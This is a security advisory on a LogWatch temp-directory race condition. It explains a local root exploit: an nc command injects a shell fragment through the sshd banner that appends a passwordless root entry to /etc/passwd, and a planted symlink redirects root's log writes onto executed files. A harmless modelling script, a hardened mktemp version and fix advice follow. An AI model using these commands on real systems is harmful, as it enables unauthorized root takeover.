LogWatch is a customizable, pluggable log-monitoring system. It goes through your logs for a given period and makes a report on the areas you choose, with the level of detail you choose. It is easy to use and works right out of the package on almost all systems. A race condition in the product can be used by local attackers to gain root privileges. What follows explains how to exploit the vulnerability by planting a command in the logs through the SSH daemon (an FTP daemon works as well).
Credit:
The information has been provided by ano nym.
Here are some ideas about exploiting the race condition in LogWatch.
First, we need a way to smuggle a command into /var/log/secure. The SSH daemon logs the client's protocol version string verbatim when it does not match, so we can send a shell fragment as the banner:
$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.
$ tail -f /var/log/secure
Apr 8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:@>>/etc/passwd #' from 127.0.0.1
The log line now carries the command we want: our leading quote pairs with the one sshd puts around the banner to form an empty string, the ampersand backgrounds whatever precedes it, and the trailing # comments out the rest of the line once a shell interprets it. How do we get it executed?
----- This is what logwatch does.
Preprocessing LogFile: secure /bin/cat /var/log/secure 2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr 6
(With the range "yesterday", applystddate keeps only the previous day's entries, so the command string has to be smuggled in the day BEFORE LogWatch runs.)
The preprocessed log is written to a file named after the log inside the temporary directory /tmp/logwatch.PID. So, if we create a symbolic link with that name inside the directory, pointing at a file root will execute:
ln -s /etc/log.d/scripts/shared/applystddate secure
the filtered log, our command line included, is written over applystddate through the symlink, and the command is executed the next time logwatch calls applystddate (many other targets exist, for example /root/.bashrc).
We can of course use other logs than secure, for example "messages", smuggling the command in through the FTPd.
So, where is the problem?
[code from LogWatch]
$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";   # predictable name: built from the PID of this run
if ( -d $TempDir ) {
    rmdir ($TempDir);
}
if ( -e $TempDir ) {
    unlink ($TempDir);
}
#### 1
# race window: the path has been cleaned up but not yet recreated
if ($Config{'debug'}>7) {
    print "\nMaking Temp Dir: " . $TempDir . "\n";
}
mkdir ($TempDir,0700);   # return value never checked: a pre-existing directory is silently reused
[code from LogWatch]
The return value of mkdir is never checked, so a directory that already exists is simply used. We need to create the directory logwatch.PID ourselves after the rmdir/unlink cleanup and before "mkdir ($TempDir,0700);", i.e. around #### 1. If LogWatch's own mkdir succeeds first, the directory is root-owned with mode 0700 and we will not be able to create the symbolic link inside it. (Since the name is built from $$, the PID LogWatch will run under has to be predicted.)
Another nice thing is that we can see when LogWatch will be executed by looking at /etc/crontab; logwatch lives in the directory /etc/cron.daily:
(02 4 * * * root run-parts /etc/cron.daily)
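As an added demonstration (not LogWatch's own code, nor part of the original advisory), the following POSIX shell script models the whole chain described above: the smuggled sshd log line, the pre-created logwatch.PID directory holding a symlink named after the log file, and the unchecked mkdir followed by the preprocessing redirect. All file names are constructed, a harmless marker stands in for the /etc/passwd append, a stand-in for a root-executed file such as /root/.bashrc is the target, and a pass-through function stands in for applystddate, so it runs as an unprivileged user inside a scratch directory. The hardened variant obtains the temporary directory from mktemp -d, which both refuses to reuse a pre-existing path and makes the name unpredictable.

```shell
#!/bin/sh
# Constructed demonstration of the LogWatch temp-dir race; not LogWatch's code.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Stand-in for a root-executed target such as /root/.bashrc (constructed path).
TARGET="$WORK/root_bashrc"
reset_target() { printf 'export PATH=/usr/bin:/bin\n' > "$TARGET"; }

# Constructed log file: one benign line plus a line shaped like the sshd entry
# in the advisory, with the marker INJECTED in place of the passwd append.
LOG="$WORK/secure"
{
    printf 'Apr 8 04:37:20 host sshd[23410]: Accepted publickey for alice from 10.0.0.5\n'
    printf "Apr 8 04:37:33 host sshd[23420]: Bad protocol version identification ''& echo INJECTED #' from 127.0.0.1\n"
} > "$LOG"

# Stand-in for applystddate: the real script filters by date; this one passes
# every line through unchanged.
applystddate() { cat; }

# Attacker's move inside the race window: pre-create logwatch.PID and plant a
# symlink named after the log file that points at the target.
attacker_plant() {
    mkdir -p "$1" && ln -s "$TARGET" "$1/secure"
}

# Exit status 0 when the marker has been written into the target.
compromised() { grep -q INJECTED "$TARGET"; }

# Vulnerable sequence, mirroring the quoted Perl: cleanup, (window), mkdir
# whose failure is ignored, then the preprocessing redirect into the temp dir.
vulnerable_run() {
    reset_target
    tmpdir="$WORK/logwatch.$1"
    rmdir "$tmpdir" 2>/dev/null || true
    if [ -e "$tmpdir" ]; then rm -f "$tmpdir" 2>/dev/null || true; fi
    attacker_plant "$tmpdir"                     # attacker wins the race here
    mkdir -m 700 "$tmpdir" 2>/dev/null || true   # fails silently: already exists
    cat "$LOG" 2>/dev/null | applystddate > "$tmpdir/secure"   # follows the symlink
    compromised
}

# Hardened sequence: the directory must be created by this process, with an
# unpredictable name; a pre-existing path is never reused.
hardened_run() {
    reset_target
    base="$WORK/logwatch.$1"
    attacker_plant "$base"                       # same trick, same timing
    tmpdir=$(mktemp -d "$base.XXXXXX") || return 1   # fresh 0700 dir or abort
    cat "$LOG" 2>/dev/null | applystddate > "$tmpdir/secure"
    compromised
}

if vulnerable_run 2318; then echo "vulnerable: target overwritten through the symlink"; fi
if hardened_run 2319; then echo "hardened: target compromised"; else echo "hardened: target intact"; fi
```

The Perl-side equivalent of the hardened variant is to check the return value of mkdir and abort on failure, or to take the directory from File::Temp's tempdir() instead of building the name from $$; a directory the process did not create itself must never be written into.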